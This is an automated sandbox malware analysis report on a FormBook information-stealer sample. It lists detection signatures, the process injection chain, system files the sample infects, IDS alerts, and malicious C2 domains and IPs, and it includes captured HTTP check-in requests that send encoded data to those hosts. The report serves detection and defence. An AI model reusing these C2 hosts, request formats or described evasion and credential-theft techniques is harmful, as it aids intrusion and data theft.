Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uG3I84bQEr.exe

Overview

General Information

Sample name:uG3I84bQEr.exe
renamed because original name is a hash value
Original sample name:fced488bab6f8793e1ca19858cf208ebc5c2b0ee18087489a2a35eb7fee803af.exe
Analysis ID:1588344
MD5:22b40728c8fb1599479347ba89387ef4
SHA1:7d951dd272c9b0b1e4295872d0004eb711f0eabb
SHA256:fced488bab6f8793e1ca19858cf208ebc5c2b0ee18087489a2a35eb7fee803af
Tags:exeWormm0yvuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • uG3I84bQEr.exe (PID: 572 cmdline: "C:\Users\user\Desktop\uG3I84bQEr.exe" MD5: 22B40728C8FB1599479347BA89387EF4)
    • svchost.exe (PID: 6940 cmdline: "C:\Users\user\Desktop\uG3I84bQEr.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • bGPwjAWMEtES.exe (PID: 6748 cmdline: "C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • bitsadmin.exe (PID: 2360 cmdline: "C:\Windows\SysWOW64\bitsadmin.exe" MD5: F57A03FA0E654B393BB078D1C60695F3)
          • firefox.exe (PID: 5440 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • armsvc.exe (PID: 432 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: AB4B4378DE9DEF8797AA78370F33CFD7)
  • alg.exe (PID: 2096 cmdline: C:\Windows\System32\alg.exe MD5: EB607CDF7D5BB12D72F7C0C992646A55)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000007.00000002.3471913898.0000000003000000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.2505596273.0000000000500000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.2505839285.00000000029A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.3472823887.0000000005F10000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000003.00000002.2506486835.0000000006550000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            3.2.svchost.exe.500000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.svchost.exe.500000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files\Mozilla Firefox\Firefox.exe", CommandLine: "C:\Program Files\Mozilla Firefox\Firefox.exe", CommandLine|base64offset|contains: , Image: C:\Program Files\Mozilla Firefox\firefox.exe, NewProcessName: C:\Program Files\Mozilla Firefox\firefox.exe, OriginalFileName: C:\Program Files\Mozilla Firefox\firefox.exe, ParentCommandLine: "C:\Windows\SysWOW64\bitsadmin.exe", ParentImage: C:\Windows\SysWOW64\bitsadmin.exe, ParentProcessId: 2360, ParentProcessName: bitsadmin.exe, ProcessCommandLine: "C:\Program Files\Mozilla Firefox\Firefox.exe", ProcessId: 5440, ProcessName: firefox.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\uG3I84bQEr.exe", CommandLine: "C:\Users\user\Desktop\uG3I84bQEr.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\uG3I84bQEr.exe", ParentImage: C:\Users\user\Desktop\uG3I84bQEr.exe, ParentProcessId: 572, ParentProcessName: uG3I84bQEr.exe, ProcessCommandLine: "C:\Users\user\Desktop\uG3I84bQEr.exe", ProcessId: 6940, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\uG3I84bQEr.exe", CommandLine: "C:\Users\user\Desktop\uG3I84bQEr.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\uG3I84bQEr.exe", ParentImage: C:\Users\user\Desktop\uG3I84bQEr.exe, ParentProcessId: 572, ParentProcessName: uG3I84bQEr.exe, ProcessCommandLine: "C:\Users\user\Desktop\uG3I84bQEr.exe", ProcessId: 6940, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T01:00:38.246645+010020507451Malware Command and Control Activity Detected192.168.2.64999985.159.66.9380TCP
                2025-01-11T01:01:27.071624+010020507451Malware Command and Control Activity Detected192.168.2.649967161.97.142.14480TCP
                2025-01-11T01:01:51.123830+010020507451Malware Command and Control Activity Detected192.168.2.64998923.225.159.4280TCP
                2025-01-11T01:02:25.653554+010020507451Malware Command and Control Activity Detected192.168.2.649993149.88.81.19080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T01:00:46.780676+010020181411A Network Trojan was detected54.244.188.17780192.168.2.649731TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T01:00:46.780676+010020377711A Network Trojan was detected54.244.188.17780192.168.2.649731TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T01:00:38.246645+010028554651A Network Trojan was detected192.168.2.64999985.159.66.9380TCP
                2025-01-11T01:01:27.071624+010028554651A Network Trojan was detected192.168.2.649967161.97.142.14480TCP
                2025-01-11T01:01:51.123830+010028554651A Network Trojan was detected192.168.2.64998923.225.159.4280TCP
                2025-01-11T01:02:25.653554+010028554651A Network Trojan was detected192.168.2.649993149.88.81.19080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T01:01:43.249080+010028554641A Network Trojan was detected192.168.2.64998623.225.159.4280TCP
                2025-01-11T01:01:46.014387+010028554641A Network Trojan was detected192.168.2.64998723.225.159.4280TCP
                2025-01-11T01:01:48.545833+010028554641A Network Trojan was detected192.168.2.64998823.225.159.4280TCP
                2025-01-11T01:01:58.155103+010028554641A Network Trojan was detected192.168.2.649990149.88.81.19080TCP
                2025-01-11T01:02:00.703887+010028554641A Network Trojan was detected192.168.2.649991149.88.81.19080TCP
                2025-01-11T01:02:03.249004+010028554641A Network Trojan was detected192.168.2.649992149.88.81.19080TCP
                2025-01-11T01:02:32.295755+010028554641A Network Trojan was detected192.168.2.64999585.159.66.9380TCP
                2025-01-11T01:02:34.860589+010028554641A Network Trojan was detected192.168.2.64999685.159.66.9380TCP
                2025-01-11T01:02:37.623969+010028554641A Network Trojan was detected192.168.2.64999785.159.66.9380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T01:00:47.813054+010028508511Malware Command and Control Activity Detected192.168.2.64973818.141.10.10780TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: uG3I84bQEr.exeAvira: detected
                Source: http://www.soainsaat.xyz/rum2/Avira URL Cloud: Label: malware
                Source: http://54.244.188.177/Avira URL Cloud: Label: malware
                Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Windows\System32\AppVClient.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Windows\System32\alg.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: uG3I84bQEr.exeReversingLabs: Detection: 81%
                Source: uG3I84bQEr.exeVirustotal: Detection: 80%Perma Link
                Source: Yara matchFile source: 3.2.svchost.exe.500000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.500000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3471913898.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2505596273.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2505839285.00000000029A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3472823887.0000000005F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2506486835.0000000006550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3471962975.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3470661135.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                Source: C:\Windows\System32\AppVClient.exeJoe Sandbox ML: detected
                Source: C:\Windows\System32\alg.exeJoe Sandbox ML: detected
                Source: uG3I84bQEr.exeJoe Sandbox ML: detected
                Source: uG3I84bQEr.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: uG3I84bQEr.exe, 00000000.00000003.2222768330.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
                Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
                Source: Binary string: ALG.pdbGCTL source: uG3I84bQEr.exe, 00000000.00000003.2230957247.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
                Source: Binary string: bitsadmin.pdb source: svchost.exe, 00000003.00000003.2473240347.0000000002A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2473112981.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, bGPwjAWMEtES.exe, 00000006.00000003.2585902954.000000000120F000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000003.00000003.2473240347.0000000002A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2473112981.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, bGPwjAWMEtES.exe, 00000006.00000003.2585902954.000000000120F000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bGPwjAWMEtES.exe, 00000006.00000000.2420600558.0000000000DDE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: uG3I84bQEr.exe, 00000000.00000003.2241132548.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, uG3I84bQEr.exe, 00000000.00000003.2240783345.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2404949163.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2402704463.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2506027142.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2506027142.000000000319E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2505813590.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3472349017.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3472349017.0000000003260000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2513176646.00000000030B5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: uG3I84bQEr.exe, 00000000.00000003.2241132548.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, uG3I84bQEr.exe, 00000000.00000003.2240783345.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.2404949163.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2402704463.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2506027142.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2506027142.000000000319E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2505813590.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3472349017.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3472349017.0000000003260000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2513176646.00000000030B5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ALG.pdb source: uG3I84bQEr.exe, 00000000.00000003.2230957247.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr

                Spreading

                barindex
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.6:49738 -> 18.141.10.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49990 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49995 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49988 -> 23.225.159.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49991 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49993 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49967 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49986 -> 23.225.159.42:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49967 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49993 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49996 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 23.225.159.42:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49989 -> 23.225.159.42:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49989 -> 23.225.159.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49999 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49999 -> 85.159.66.93:80
                Source: DNS query: www.soainsaat.xyz
                Source: Joe Sandbox ViewIP Address: 149.88.81.190 149.88.81.190
                Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.6:49731
                Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.6:49731
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004722EE
                Source: global trafficHTTP traffic detected: GET /xxr1/?WldT=UFzdV2kX3&9V7X=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nb-shenshi.buzzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /sgdd/?9V7X=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRjDpBSVBr7xCoBK9DVxTDHFUGGR5RoH3IsxqdsiGMvHVT1pqSHQ=&WldT=UFzdV2kX3 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.laohub10.netConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /rq1s/?9V7X=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF2aRhq0xPreKegZNgRyigK2URQJRetLL6xmvJtnHWTfyzSbGWdrg=&WldT=UFzdV2kX3 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.xcvbj.asiaConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /rum2/?9V7X=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygBkidEg+kRQXv4obyNPkBDCtbUb3LL9ptfYbieFsxGE9yCAarRKSI=&WldT=UFzdV2kX3 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.soainsaat.xyzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                Source: global trafficDNS traffic detected: DNS query: www.nb-shenshi.buzz
                Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
                Source: global trafficDNS traffic detected: DNS query: www.xcvbj.asia
                Source: global trafficDNS traffic detected: DNS query: www.soainsaat.xyz
                Source: unknownHTTP traffic detected: POST /exqctojotladvua HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 808
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 00:01:26 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 